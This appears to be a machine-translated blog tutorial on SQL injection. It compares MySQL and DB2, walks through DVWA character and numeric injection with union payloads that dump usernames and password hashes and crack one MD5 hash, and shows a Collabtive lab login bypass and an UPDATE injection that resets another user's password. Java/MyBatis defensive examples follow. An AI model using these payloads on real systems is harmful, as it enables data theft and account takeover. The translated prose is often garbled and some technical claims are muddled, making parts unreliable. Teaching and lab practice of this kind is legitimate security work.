Article From:
  • The principle of buffer overflow is studied. At least two databases are differentiated.
  • Aiming at different data types, we study the discovery and injection technology of SQL injection point.
  • Research on buffer overflow prevention methods, at least for two programming languages for differential research
  • Inject at least two kinds of databases into attack tools

database base

Comparison of databases MySQL and DB2

1.Account management mode

MySQLThe way of account management is similar to Oracle, managed by MySQL, and the account is stored in the user table of the MySQL database. The account is composed of IP address + user name, and DB2 has no own user system, and its authentication is entirely dependent on the account of the operating system.

2.Authority management mode

MySQLThe right management method is the same as the way of DB2 authority management. It can authorize individual objects and achieve fine granularity authorization. The difference is that MySQL is better at account security. Its account is made up of user names plus IP addresses, that is, its authentication needs.At the same time, verify the legality of user login IP and user name, while DB2 only authenticate the linked account. Another advantage of MySQL is that the object of the smallest unit can be authorized in batch, and DB2 is not, relatively cumbersome, which is one of the places where DB2 needs to be improved.

3.Log management

MySQLThe database uses log double write to ensure the integrity and recoverability of the data, and there is no causal relationship between the transaction log of MySQL and the two independent objects of the archived log. The archiving log of DB2 database is generated by transaction log. So the performance of the MySQL database on the UDI operationIt’s a little worse than DB2.

4.Management mode of lock

MySQLThe MVCC model is used to realize the concurrency control of the lock. The DB2 uses the memory model to realize the concurrency control of the lock. The concurrency processing ability of MySQL is described in the concurrent processing and processing resource conflicts, and the lock conflict is better than the DB2.

5.schemaManagement mode

MySQLIn the strict sense of database, there is no concept of schema, and each schema is equivalent to an independent database. DB2 database can create more than one schema in one database. This is also the deficiency of MySQL in schema and the need for improvement.

6.Management mode of table space

MySQLThe database only has the concept of tablespace after 5.6, but its way of using tablespace differs greatly from that of enterprise database. MySQL database is relatively weak in tablespace, and there are many limitations. There are weaknesses in the management of strip space and space. DB2 is doing these thingsThey are very perfect, and are very strong and easy to maintain. These are the places where MySQL needs to learn from enterprise databases.

7.The way of dealing with the behavior of things

MySQLThe database acquiescence is only the state of the back of a statement when dealing with transaction related operations, and the whole transaction is not actually completed (submission or rollback), but the choice is to submit or roll back the entire transaction by the application when the error is detected. The way the DB2 database handles transactions is when DB2 databases roll back the entire transaction after a lock timeout or other problems cause an exception, instead of rolling back to the last save point, which is a place to pay special attention to.

8.Management mode of data backup

MySQLThere are many ways of backup, but the open source community backup tool is very poor in terms of supporting online backup function and ease of use. DB2 database is very perfect, rigorous and easy to use in this respect. This is also the place where MySQL needs to learn from DB2 database.

9.Management mode of data recovery

MySQLDatabase recovery is very special. You can open data and check data in the process of recovery or roll forward. If you need to continue rolling forward, you can continue to perform roll forward action. This is an advantage of the MySQL database, which is also a very good place for other commercial database vendors to do. DB2 dataThe library is very strict in the recovery management of the database. In the process of roll forward or recovery, in order to ensure the integrity and consistency of the data is not destroyed, the database can not be opened. In my opinion, this is both an advantage and a drawback. The advantage is that the entry is simple, and the shortcoming is poor flexibility.Back to the time point, do we have the data we need?

10.SQLfunctional comparison

MySQLA lot of jion support is not good enough for complex SQL support, and DB2 is very powerful in complex SQL support, and provides a variety of jion ways to ensure and improve the efficiency of data access. This is where MySQL needs to learn from DB2.

11.DDLOperation comparison

MySQLIt supports adding columns at any location to suit business needs, and also supports online DDL to ensure continuity of business. All of the above features are not supported by DB2.

12.Grammatical difference

MySQLThe default uses case sensitive database names, table names, and column names (which can be controlled by lower_case_table_names parameters), and the DB2 database is insensitive to case and case.

Although MySQL and DB2 both follow and conform to the SQL92 standard, most SQL are compatible with each other, but there are some differences in the implementation of some details. For example, MySQL uses the limit syntax on the first few lines that match the criteria, while DB2 uses fetch syntax..

13.High availability and disaster tolerance design

MySQLThere are a lot of solutions for high availability and disaster tolerance. MySQL supports a variety of architectures and replication solutions to complete the high availability of the database and disaster tolerance requirements such as MHA, PXC and MMM, and is very flexible, can be customized according to business requirements, two development, almost zero. DB2 inThis is only the HADR scheme and the cost is high.


MySQLThere are also a lot of solutions in the cluster, such as Cobar, Atlas, Fabric, Amoeba, TDDL, Mycat and can be customized or developed two times, which can be flexibly extended according to business requirements. DB2 is now only PureS in this areaCale a solution with poor flexibility. This is where DB2 needs to learn from MySQL.

Familiarity with SQL statements

(1)Using the DVWA database

use dvwa;

(2)Inquire all the information of the user name “admin” in the users table.

select * from users where user='admin';

It has the aboveThree points

  1. ‘*’:Wildcards denote matching all contents, that is, to refuse to refuse.
  2. ‘where’:The keyword is defined as a condition.
  3. In databases, strings are usually wrapped by single quotes. Here, select retrieves data from databases.

(3)Let’s take a look at the other side of the select statement, which is equivalent to the output statement of our programming language.

select 'hello world!';

(4)If we have multiple data to output, we can use “” to separate each content at this time.

select user,user_id from users where user='admin';

When we want to just output a lot of data, instead of retrieving data,

select 'hello','world';
select 1,2,3;

(5)union union

That is to put the heap of data in front of Union and the heap data together so that it can be displayed in one table. Pay attention to what is put together?

Look at the examples:

select 1,2,3 union select 4,5,6;

Parsing, we know that select 1,2,3 outputs three numbers, 1,2,3 respectively. The select behind is the same as the output of 3 numbers.

If the number of output data behind is inconsistent, then the following errors will occur.

The used SELECT statements have a different number of columns

This is a point of SQL injection after us.

(6)We then proceed to learn a content order by, which is the ascending or descending order of the data we retrieved.

select user,user_id from users order by user;

Here we introduce a concept called “field”. A field is also a data column in a table, and each field represents a column. For example, here, we retrieve two data columns of user and user_id from our select statement. When we use order by userIt will be sorted according to every data in the user data column, and the default is ascending ASC.

Let’s look at it.

select user,user_id from users order by user_id;

You can see that the order of user_id is increasing. If you decline, you can use desc.

And there’s a small tips here:

In addition to using the field name as the condition of order by, we can also use numbers.

1The first field of the representation

2The second fields represented

This analogy is fine, but when there is no field, it will produce such a mistake.
unknown column name xx

sql injection point”

sqlInjection type


1、Testing and analyzing the functionality of a page
We can see that there is an input box here. According to the above prompt, enter the user’s ID. Then we entered it and found that it returned information about this user. Here we enter “1”

You can see that it returns three rows of data, one line is the user ID we entered. One line is username and the other is user alias.

At the same time, I will look at the browser’s address bar and find that URL is like this.


We can see that there is a id=1 in here, is it the user ID that we input?
Here we enter “2” and find that URL is changed.


Well, here, we can come to the conclusion that the value of the ID we wear here is controllable. What we input will pass through ID!

2、Test the ID parameter to see if there is a SQL injection vulnerability.
Here we enter “1′” in the input box, and note that there is a single quotation mark “1” behind it.
It can be found that there is a wrong report here. We say that our SQL statement has a grammatical error.

Here we can make a guess. First, the ID is wrapped by two. A query may be like this
select firstname,surname from users where id = ‘1’;
When we add a quotation mark after 1, the number of single quotes will be unbalanced, when the query is as follows.
select firstname,surname from users where id = ‘1”;
We can see that the last quotation mark has not been closed. What shall we do then?
There are several ways to do this at this time.
(1)We continue to input another quotation mark on the original basis, that is, “1””.
At this time, let’s look at the query statement
select firstname,surname from users where id = ‘1”’;
It’s time to talk about a MySQL grammar,

In the where statement, when there are multiple strings, "=" will select the highest priority, with priority decreasing from left to right. It's the nearest one from "=".Let's take a few examples.The first is a SQL query similar to ours.SELEct * from users where user_id ='1''';The second one is to clarify our priority,Select * from users where user_id ='1''2';You can see that the result is still the same as user_id=1.Let's look at a long one.Select * from users where user_id ='1''2''abc''efg';Fact is better than eloquence, butTo see the result is the same as the above.

(2)The second way is to use the symbols to indicate the quotation marks.
The query statement will become so at that time.
select firstname,surname from users where id = ‘1’#’;
(3)The third way is to use “-“, noting that there is a space behind “-“. In URL, we need to use “+” to replace the space behind “-“.
The query statement will become so at that time.
select firstname,surname from users where id = ‘1’– ‘;

OK, let’s go back to our test page. The results found are the same as the input 1.
Here we can know
[1]The parameter of the vulnerability is “Id”
[2]The type of vulnerability is character type

3、Well, after we confirm the loopholes, we need to construct payload.
What is payload?
It’s a malicious code so that we can get data from the data.
(1)Number of analysis fields
Basically, he has two ways of doing it.
[1]The reason for analyzing the number of fields is that we need to use the union select statement to get the sensitive data we need.
So, here, I leave a question: why can I guess how to use union to get data?
(Hint: what is the function of this page?)
According to our order by knowledge above, if the number behind is beyond the number of fields, it will be wrong. Through this we can determine the number of fields.
The payload we construct is as follows:
1′ order by 1#
1′ order by 2#
1′ order by 3#
When I entered 3, it was found that it was wrong. That is, the number of fields is 2

[2]The second way is to guess the number of fields directly with union select, because when the number of fields is not corresponding, it will also cause errors.
1′ union select 1#
1′ union select 1,2#
1′ union select 1,2,3#
It can be found that there is no error when union select 1,2, that is, the number of fields is 2. At the same time, we should also notice that there seems to be three more data in the return. What is this?

This is the data from our union select. The information we get from the data is changed to data by 1,2, so we can get the page by looking at the page.
Tips:When the number of fields is small, it doesn’t matter. If you have more fields, you will be silly. Hack with Python for the next lesson. We will write scripts to do these meaningless tasks.

(2)The number of fields is 2, that is, the data column coming out of select has two columns. That is, we can produce two data through union select. OK, let’s get information about our database.
1、Get the name of the current database, the current username
1′ union select database(),user()#
Here we explain that database () will return the database name used by the current web site, and user () will return the user name for the current query.
OK, here we see
The current database is: DVWA
Current Username: root@localhost

A similar function: Version () gets the current database version.
Tips:Sometimes, the following select statement will limit the number of output lines, through limit 1, so in general, the original database query will be invalid, that is, the invalid ID.
As follows:
-1′ union select database(),user()#
This will only return to our data
2、OK, our goal is to get the current user table, so we continue to construct payload.
Based on the above information, we know that the current database name is DVWA. But it’s not enough! What is the name of the table?

Of course, it’s the users watch!
And after that? Isn’t there a columns table?
So what do we need? Need table_name and table_schema
So what do we look for? Column_name

This time the payload of our structure is as follows
-1′ union select column_name,2 from information_schema.columns where table_schema= ‘dvwa’ and table_name= ‘users’#
Here, if you do not specify a database name’dvwa’, if there are users tables in other data, there will be a lot of confused data.

B, a lot of data! What are we interested in that??
Of course, it’s user, password! Two fields are just good
OK, let’s revise payload again
-1′ union select user,password from users#

Binggo!We note out all user names and password values, and so on! This code seems to be a little wonderful, count, 32!
The password here is encrypted through MD5, so it is difficult to inject management accounts and passwords, but the cipher is encrypted.
Is it all right? Not always!
Tips:Boy, who asked you to meet me! Look at me in a big way
At this time, we need to find some websites to crack MD5.
Well, what I like more is this Click
OK, what we choose here is the Pablo’s solution. The MD5 ciphertext is: 0d107d09f5bbe40cade3de5c71e9e9b7

You can see that the password has been cracked, and the password is “letmein”. Let’s verify it.
Look, we have successfully landed at this time!

2.Digital type

1、Or to come to our SQL injection, you can see that here is the same as last time, give an input box, let us enter the value of ID, and then return to the two information of firstname and surname corresponding to ID.
[1]When we enter the normal Figure 1, we can see that we return the corresponding data.

[2]When we input “1′”, we can see that there is a wrong message. In other words, the user’s input has not been properly processed, resulting in database syntax errors, it seems that there is a drama!

At the same time, we carefully observed that we entered the “” “by” “escape” and become “like”. That is to say, the filtering of the application should be based on the addslashes similar function in PHP, which will process four data. They are single quotes [‘] and doubleQuotation marks, backslashes, empty characters [null].
[3]Here we continue to test and see if we use similar functions.
Test data:

(1) “1″”


(3)“%00”Note that we can’t input empty characters with keyboard, but we can use%00 to express on URL, so there will be%00 on the address bar.

(4)Test the other characters, “-” and “&amp”. It can be found that although the report is wrong, there is no escape character.

2、At this time we think about, if the character type injection point, our input single quotes have been turned out, in principle, should not appear the wrong message.
First, the database is selected as DVWA
use dvwa;
Here we test it in the local database.
select * from users where user_id = ‘1”;

It can be seen that when our input statement carries a single quotation mark on the escape sign, it will not only fail to report the error, but also can successfully query it.
(1)The reason why the error is not reported is that the single quotation mark here has been escaped, and the value of the entire string is 1′.
(2)So why do you search for success?
The knowledge involved is coercive type conversion. Let’s look at the definition of tables first.
describe users;

You can see that the type of user_id is an int integer, and when our query is the same as above, MySQL will convert the string force type into a int type, but this transformation is defective!
Here are three examples, you feel it!
select * from users where user_id = ‘1abdc’;

select * from users where user_id = ‘abdc’;

select * from users where user_id = ‘2abdc’;

In the above example, the second one does not have numbers at the beginning, so it will be converted to 0 when changing the type.
You can see this example in detail.

3、According to the analysis of the above two parts, we can know that the data we have passed in this time are not wrapped in single or double quotes. At this time we have to introduce second types of injection points, digital injection.
(1)The test shows that it is digital, so we can do a simple addition and subtraction to know if it has injection point.
Test: in the input box
[1]When entering 2, the user information of ID is 2.
[2]When you enter 1+1, the feedback is the same as the result of 2. That means there is an injection point here. Similarly, you can use the symbols of “minus”, “*”, “/”.

PS:But what we should pay attention to here is that in URL, “+” has a special meaning. It represents a blank space. So in URL, we need to use “%2B” instead of “+”.

Two. Construct payload
Simple explanation: in fact, digital injection is that our data can be directly injected into queries without closing single quotes. So the construction of payload part is very much like character type.

1、Conjecture field number
Here use order by to guess
1 order by 1
1 order by 2
1 order by 3

It can be found that at 3, there was a mistake. As a result, you can get the number of fields 2

2、After that, the process is just like character injection, which only removes the single quotation marks and the last annotation symbols in front of Payload. If you have doubts, you can look at an article. But let’s focus on this. If we want to use strings, there are two ways.

[1]It is represented by the sixteen hexadecimal of a string, for example, admin is converted to sixteen binary, and is called “61646D696E”.

Then we add 0x61646D696E to the sixteen binary system.

We construct the payload like this
select * from users where user = 0x61646D696E;

[2]The char function is used, but the char function here uses the decimal ASCII value. For example, admin
CHAR(97, 100, 109, 105, 110)
The payload of the structure is like this
select * from users where user = CHAR(97, 100, 109, 105, 110);

3、The final payload is constructed here
Get the name of the database:
-1 union select 1,database()

Get the table name:

-1 union select table_name,2 from information_schema.tables where table_schema = database()

Get the column names of the users table
-1 union select column_name,2 from information_schema.columns where table_schema = database() and table_name = 0x7573657273

Getting the content of the Datasheet
-1 union select user,password from users;

4、Well, when we go to the MD5 website to crack the password, our partners are excited.
Here we choose the user whose user name is 1337, OK!

programming language”


See the phpbb practice later.

MyBatis+java defense examples
  1. When using JDBC, the SQL statement is spliced

    When using statement’s functions such as executeQuery, execute and executeUpdate, the incoming SQL statements spliced the untrusted parameters from outside.

    Error examples
    String userName = ctx.getAuthenticatedUserName(); //this is a constant
    //itemNameIs the external read into the parameters spliced to the SQL statement
    String sqlString = “SELECT * FROM t_item WHERE owner='” + userName + “‘ AND itemName='” + request.getParameter(“itemName”) + “‘”;
    stmt = connection.createStatement();
    rs = stmt.executeQuery(sqlString);

    Solution 1) using precompiled (untrusted data as field values); 2) the white list check (untrusted data as table name, field name, sort mode) for the external parameters in the SQL statement.

    Correct example:Check itemName with white list check
    String userName = ctx.getAuthenticatedUserName(); //this is a constant
    String itemName=getCleanedItemName(request.getParameter(“itemName”));
    String sqlString = “SELECT * FROM t_item WHERE owner='” + userName + “‘ AND itemName='” + itemName + “‘”;
    stmt = connection.createStatement();
    rs = stmt.executeQuery(sqlString);

    When using connection’s PreparedStatement, the SQL statement used spliced the untrusted parameters from outside.

    Error examples
    String userName = ctx.getAuthenticatedUserName(); //this is a constant
    //itemNameIs the external read into the parameters spliced to the SQL statement
    String itemName = request.getParameter(“itemName”);
    // …Ensure that the length of userName and itemName is legitimate
    // …
    String sqlString = “SELECT * FROM t_item WHERE owner=? AND itemName='”+itemName+”‘”;

    PreparedStatement stmt = connection.prepareStatement(sqlString);
    stmt.setString(1, userName);
    rs = stmt.executeQuery();

    Solution 1) change the splicing mode to placeholder mode; 2) whitelist check the external parameters that are spliced into the SQL statement.

    Correct example:All parameters use placeholders

    String userName = ctx.getAuthenticatedUserName(); //this is a constant
    String itemName = request.getParameter(“itemName”);
    // …Ensure that the length of userName and itemName is legitimate
    // …
    String sqlString = “SELECT * FROM t_item WHERE owner=? AND itemName=?”;

    PreparedStatement stmt = connection.prepareStatement(sqlString);
    stmt.setString(1, userName); // jdbcThe number starts from 1
    stmt.setString(2, itemName);
    rs = stmt.executeQuery();

    Stored procedures use dynamic ways to build SQL statements, resulting in SQL injection risk.

    Error examples

    REATE PROCEDURE sp_queryItem
    @userName varchar(50),
    @itemName varchar(50)
    DECLARE @sql nvarchar(500);
    SET @sql = ‘SELECT * FROM t_item
    WHERE owner = ”’ + @userName + ”’
    AND itemName = ”’ + @itemName + ””;

    A method of parameterized query

    Correct example

The way of parameterized query
@userName varchar(50),
@itemName varchar(50)
SELECT * FROM t_item
WHERE userName = @userName
AND itemName = @itemName;

  1. When using Hibernate, when calling API, the incoming SQL statement has spliced external parameters.

    When calling createQuery, the incoming SQL statement spliced the untrusted parameters from outside.

    Error examples
    //SQLStatement splicing untrusted parameters
    String itemName = request.getParameter(“itemName”);
    Query hqlQuery = session.createQuery(“from Item as item where item.itemName = ‘” + itemName + “‘”);

    Solution 1) whitelist checkout for external parameters spliced into SQL statements; 2) use hibernate’s configuration mapping relationship.

    Correct example:Verifying the white list of external parameters
    String itemName = request.getParameter(“itemName”);
    itemName=getCleanedItemName(itemName);//Whitelist checklist
    Query hqlQuery = session.createQuery(“from Item as item where item.itemName = ‘” + itemName + “‘”);

  2. When using MyBatis, the SQL statement uses the $placeholder

    The configuration file uses the $placeholder

    Error examples:

    // With $, a simple splicing will be used at the bottom

SELECT * FROM t_item WHERE owner = $userName$ AND itemName = $itemName$

Solution 1) change the $placeholder into a placeholder; 2) if the external untrusted data is used as the table name, field name, and sort mode, the external parameters are whitelated.* * * the correct example * *: use the placeholder modeSELECT * FROMT_item WHERE owner = #userName# AND itemName =#itemName#The SQL statement of the function label in the mybatis interface uses a $placeholder.* * * error examples * *Public interface IUserDAO {/ / the SQL statement in the annotation indicates the placeholder through the dollar, and the internal implementation is simply stitching.@Select ("select *from User where id=${iD})User getUser (@Param ("Id") String ID);}* * the correct example *: the SQL statement in the annotation represents the placeholder through the "X", and the internal implementation is parameterized preprocessing.Public intErface IUserDAO {@Select ("select *from User where id=#{id})User getUser (@Param ("Id") String ID);}

database injection practice

Collabtive system SQL injection experiment”

Environment construction

(1)Start the MySQL database

(2)Start the Apache server

(3)Configuring DNS services

sudo vim /etc/hosts

(4)Configuring the web file

sudo vim /etc/apache2/conf.d/lab.conf

sudo service apache2 restart  Reboot service

(5)Closing the PHP configuration policy

sudo vim /etc/php5/apache2/php.ini

On the magic_quotes_off function:

For the case of magic_quotes_gpc=on, we can not do the operation of addslashes () and stripslashes () on the string data of the input and output database, and the data will also be displayed properly.

If you do addslashes () processing on the input data, you must use stripslashes () to remove the extra backslash when exporting.

For the case of PHP magic_quotes_gpc=off

The input data must be processed with addslashes (), but it does not need to use stripslashes () formatted output, because addslashes () does not write the backslash into the database together, only helping the MYSQL to complete the SQL statementThat’s ok。

Experimental content

(1)selectSQL injection of statements

Visit:; when we know the user and don’t know the password, how can we log in?

Check the login authentication file:

sudo vim /var/www/SQL/Collabtive/include/class.user.php

After the modification, restart the server.

sudo sudo service apache2 restart

After we add it to $user, we will only verify the user name, and the back will be annotated.

After clicking on the login, we can bypass the password and log in directly.


Login user name: admin’) union update user set name=’test’

Login password: random characters

Landing failure

Explanation of reason

MySQLMechanism: update does not support union syntax.

(2)updateSQL injection of statements

We can find the following code:

function edit($id, $name, $realname, $email, $tel1, $tel2, $company,
          $zip, $gender, $url, $address1, $address2, $state,
          $country, $tags, $locale, $avatar = "", $rate = 0.0)
$name = mysql_real_escape_string($name);
$realname = mysql_real_escape_string($realname);

//modified for SQL Lab
//$company = mysql_real_escape_string($company);
$email = mysql_real_escape_string($email);

// further escaped parameters removed for brevity...

$rate = (float) $rate;
$id = (int) $id;

if ($avatar != "")
        $upd = mysql_query("UPDATE user SET name='$name', email='$email',
                            tel1='$tel1', tel2='$tel2', company='$company',
                            zip='$zip', gender='$gender', url='$url',
                            adress='$address1', adress2='$address2',
                            state='$state', country='$country',
                            tags='$tags', locale='$locale',
                            avatar='$avatar', rate='$rate' WHERE ID = $id");
        // same query as above minus setting avatar; removed for
        // brevity
if ($upd)
        $this->mylog->add($name, 'user', 2, 0);
        return true;
        return false;

The SQL statement is found to be SELECT ID WHERE name=’$user’, and the location of company is injection flaw, which is the same as experiment 1.

In this way, we can go beyond the authority to modify other users’ information and password; we use any user, such as Bob Bob to login.

Edit user’s location: user fill in Ted user; Company fill in:

‘, pass = ‘9d4e1e23bd5b727046a9e3b4b7db57bd8d6ee684’ WHERE ID = 4 # ‘

Note: the 9d4e1e23bd5b727046a9e3b4b7db57bd8d6ee684 here is the MD5 value of pass.

Click Modify, then we exit the current user and log in with Ted user. This time, the Ted user’s password is modified to pass.

Defense strategy

SQLThe fundamental problem of injection holes is the separation of data and code, so we can defend against this reason.

Defense strategy 1

To defend the escape of special characters, open magic_quotes_gpc by default and set the magic_quotes_gpc value to On.

Defense strategy 2– avoids the use of special characters

MySQLProvide a function mysql_real_escape_string (), which can be used to filter some special characters, such as \x00, \n, \r, “,” and \x1a;

Separation of defense strategy 3– data from SQL statements

SQL logic separation is used to tell which part of the database is the data part and which part is the SQL statement part.

sqlmap automation injection”


Using the input of the web application to verify the imperfect vulnerabilities, make the web application execute the malicious instructions and code injected by the attacker, causing the harmful consequences of the leakage of sensitive information, the promotion of the authority, or the unauthorized access to the system.

SQLInjection attack steps:

  • Discovery of SQL injection point
  • Judging the type of backstage database
  • Guessing of password of administrator user in backstage database
  • Upload ASP back door, get default account permissions
  • Local privilege escalation
  • Using the database extension stored procedure to execute the Shell command
    SQLInjecting attack tools:
  • Wposion Finding SQL injection vulnerabilities in dynamic web documents
  • wieliekoek.plUsing the input generated by the web mirror tool to output, the string is injected into the form page.
  • SPIKE Proxy Customize the injected string
  • SPI ToolkitTool kit

SQLInjection attack prevention:

  • Using type safe parameter encoding mechanism
  • Complete check from user input from outside
  • Replace the dynamic SQL statement with stored procedures, precompiled SQL or ADO command objects.
  • Strengthening the configuration and connection of the SQL database server

Leave a Reply

Your email address will not be published. Required fields are marked *